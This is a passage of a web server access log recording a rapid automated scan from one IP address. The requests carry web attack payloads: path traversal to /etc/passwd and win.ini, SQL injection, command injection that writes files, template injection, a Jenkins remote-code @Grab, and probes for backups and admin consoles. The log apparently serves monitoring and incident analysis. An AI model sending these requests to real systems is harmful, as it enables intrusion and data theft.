/api/v4/ci/lint HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "GET /admin/sql?query=SELECT%20md5(204185616) HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "GET /api/proxy/tcp HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "GET /axis2/services HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "GET /debug/pprof/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "GET //fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "GET /h2-console HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "GET /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../etc/passwd HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "GET /api/v1/GetSrc HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "GET /ws/v1/cluster/info HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "POST /php/change_config.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:41 -0500] "GET /data.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET /api/proxy/tcp HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET /data/login.php::$DATA HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET //ckeditor/samples/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET /axis/servlet/AxisServlet HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET /serverLog/showFile.php?fileName=../web/html/main.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../windows/win.ini HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:42 -0500] "GET /api/v1/GetDevice HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "PUT /SDK/webLanguage HTTP/1.1" 405 1084 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "GET /him/api/rest/V1.0/system/log/list?filePath=../ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "POST /fileDownload?action=downloadBackupFile HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "GET /web.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "GET /php/setup.php?step=2&PDF2SWF_PATH=printf%20lvnczo%25%25lvnczo%20%3e%20ivoasq HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "GET /index.htm?PAGE=web HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "PUT /qthllb.txt HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "GET /ping HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "GET /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b8965117*9854630%7d HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "GET //editor/ckeditor/samples/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "POST /login HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "GET /axis2/servlet/AxisServlet HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:43 -0500] "GET /jmx-console/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:44 -0500] "GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:44 -0500] "GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1" 400 - 38.110.228.166 - - [15/Jan/2025:00:02:44 -0500] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27fljq%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:44 -0500] "GET /script HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:44 -0500] "GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:44 -0500] "GET /%2e/WEB-INF/web.xml HTTP/1.1" 404 990 38.110.228.166 - - [15/Jan/2025:00:02:44 -0500] "GET /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:44 -0500] "GET /secure/QueryComponent!Default.jspa HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:44 -0500] "GET /secure/ViewUserHover.jspa?username=fyjzkooc HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET /db.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "POST /index.php?option=com_vreview&task=displayReply HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET /php/ivoasqpdf2swf HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET //ckeditor/samples/sample_posteddata.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1'%20AND%20EXTRACTVALUE(22,CONCAT(0x7e,md5(887973520)))--%20X HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET /api/v1/users/connection-token/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET /axis2/services/listServices HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET /terminals/3 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "POST /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../Windows/win.ini HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:45 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:46 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:46 -0500] "POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:46 -0500] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:46 -0500] "GET /app/kibana HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:46 -0500] "GET /htmltopdf/downfile.php?filename=/windows/win.ini HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:46 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:46 -0500] "GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:46 -0500] "GET /hosts HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:46 -0500] "GET /api/v1/nodes HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:46 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:46 -0500] "GET /database.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:46 -0500] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1056 38.110.228.166 - - [15/Jan/2025:00:02:47 -0500] "GET /api/v1/authentication/connection-token/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:47 -0500] "GET //editor/ckeditor/samples/sample_posteddata.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:47 -0500] "POST /_ignition/execute-solution HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:47 -0500] "POST / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:47 -0500] "GET /storage/logs/laravel.log HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:47 -0500] "GET /../conf/config.properties HTTP/1.1" 400 - 38.110.228.166 - - [15/Jan/2025:00:02:47 -0500] "GET /index.php?m=vod-search&wd={if-A:printf(md5(899125254))}{endif-A} HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:47 -0500] "POST /extend/Qcloud/Sms/Sms.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:47 -0500] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,43797*41453,5,6,7%20limit%205,1%20%23 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:47 -0500] "GET /axis/services/FreeMarkerService HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:47 -0500] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:48 -0500] "GET /include/thumb.php?dir=http\..\admin\login\login_check.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:48 -0500] "GET /include/thumb.php?dir=http/.....///.....///config/config_db.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:48 -0500] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+42982*41994,1--+&site=admin HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:48 -0500] "GET /appmonitor/protected/selector/server_file/files?folder=/&suffix= HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:48 -0500] "GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:48 -0500] "GET /images/lists?cid=1%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,md5(888742895)))%20desc%20--+a HTTP/1.1" 404 990 38.110.228.166 - - [15/Jan/2025:00:02:48 -0500] "GET /ftp.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:48 -0500] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1056 38.110.228.166 - - [15/Jan/2025:00:02:48 -0500] "POST /minio/webrpc HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "GET //fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "GET /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5(2018710103))%23 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "GET /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(2021062286))%23 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "POST /nagiosql/admin/logbook.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "POST /nagiosql/admin/menuaccess.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "GET /download.php?file=../../../../../etc/passwd HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "POST /user/login/checkPermit HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "GET /axis/services/AdminService HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "POST /directdata/direct/router HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "POST /passwordrecovered.cgi?id=get_rekt HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "POST /service/extdirect HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "POST /rest/beta/repositories/go/group HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "POST /extdirect HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1" 400 - 38.110.228.166 - - [15/Jan/2025:00:02:49 -0500] "GET /service/local/authentication/login HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:50 -0500] "GET /admin.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:50 -0500] "POST /minio/webrpc HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:50 -0500] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh%20HTTP/1.0 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:50 -0500] "GET //fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:50 -0500] "GET /../../../../../../../../windows/win.ini HTTP/1.1" 400 - 38.110.228.166 - - [15/Jan/2025:00:02:50 -0500] "GET /ui_base/js/..%2f..%2f..%2f..%2fsettings.js HTTP/1.1" 400 - 38.110.228.166 - - [15/Jan/2025:00:02:50 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:50 -0500] "GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:50 -0500] "POST /login/verify HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:50 -0500] "GET /css_parser.php?css=css_parser.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:50 -0500] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:50 -0500] "GET /webapi/v1/system/accountmanage/account HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:51 -0500] "POST /login/userverify.cgi HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:51 -0500] "GET /s/opentsdb_header.jpg HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:51 -0500] "POST /login/userverify.cgi HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:51 -0500] "GET /data/pbootcms.db HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:51 -0500] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:51 -0500] "GET /getFavicon?host=baidu.com/? HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:51 -0500] "POST /scripts/setup.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:51 -0500] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:51 -0500] "GET /type.php?template=tag_(){}%3b@unlink(file)%3becho%20md5($_GET[1])%3b{//../rss HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:51 -0500] "GET /api.php?c=project&f=index&token=1234&id=news&sort=1%20and%20extractvalue(1,concat(0x7e,md5(909452847)))%20--+ HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:51 -0500] "GET /upload.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:51 -0500] "GET /index.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "GET /include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28md5(207837500)%29,4,5,6,7,8,9,10,11,12%23_ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "GET /31065240.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "GET /new/newhttps:/baidu.com HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "POST /upload/UploadResourcePic.ashx?ResourceID=7224 HTTP/1.1" 200 2142 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 400 - 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "POST /debug/pyspidervulntest/run HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "GET /f/job.php?job=getzone&typeid=zone&fup=..\..\do\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5(207744784),9,10,11,12,13,14,15,16,17,18,19%23 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "GET /get_luser_by_sshport.php?clientip=1;echo%20"">/opt/freesvr/web/htdocs/freesvr/audit/xxwnpgdjgc.php;&clientport=1 HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "GET /base_import/static/etc/passwd HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "POST /photo/p/api/album.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "GET /api/whoami HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 400 - 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "GET /package.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:52 -0500] "GET /tests/generate.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20842913475%20%2B%20851806682%20%20%23 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "GET /%20../web-inf/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "POST /index.php?action=login.index&host=0 HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "POST /login.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "GET /index.html HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "POST /login.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "POST /guest_auth/guestIsUp.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "POST /login.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "POST /WEB_VMS/LEVEL15/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "GET /login.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "GET /run HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:53 -0500] "POST /main.ehp HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "POST /(download)/tmp/1.txt HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "GET /report/download.php?pdf=../../../../../etc/hosts HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "POST /(download)/tmp/rwnutail.txt HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "GET /old.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "GET /tool/log/c.php?strip_slashes=md5&host=wwzklrjw HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "GET /ui/login.php?user=admin HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "GET /tool/log/c.php?strip_slashes=printf&host=txhuyidn%25%25smsdpchj HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "GET /comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "POST /search.php?print(923076285%2b959720543) HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "GET /data/cache_template/rss.tpl.php?1=908764152 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "GET /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:54 -0500] "GET /31065240.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "POST /search.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "POST /search.php?searchtype=5 HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "GET /guest_auth/xtqp.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "GET /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(202720610)) HTTP/1.1" 404 1048 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "GET /login.html HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "GET /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "GET /test.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "GET /seeyon/management/index.jsp HTTP/1.1" 404 1046 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "POST /seeyon/thirdpartyController.do HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 404 1058 38.110.228.166 - - [15/Jan/2025:00:02:55 -0500] "GET /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20all%20select%201,2,@@version,md5(204891138)%23 HTTP/1.1" 404 1084 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "POST /seeyon/thirdpartyController.do HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "GET /data/mysqli_error_trace.php?_=printf(md5("rggpgbpr"))%3B HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "GET /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5(209086066),7-- HTTP/1.1" 404 1066 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "GET /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "GET /index.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(206932204),0x7e),1) HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "POST /index.php?s=/home/page/uploadImg HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "POST /graphql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "POST /server/index.php?s=/api/user/login HTTP/1.1" 200 2145 38.110.228.166 - - 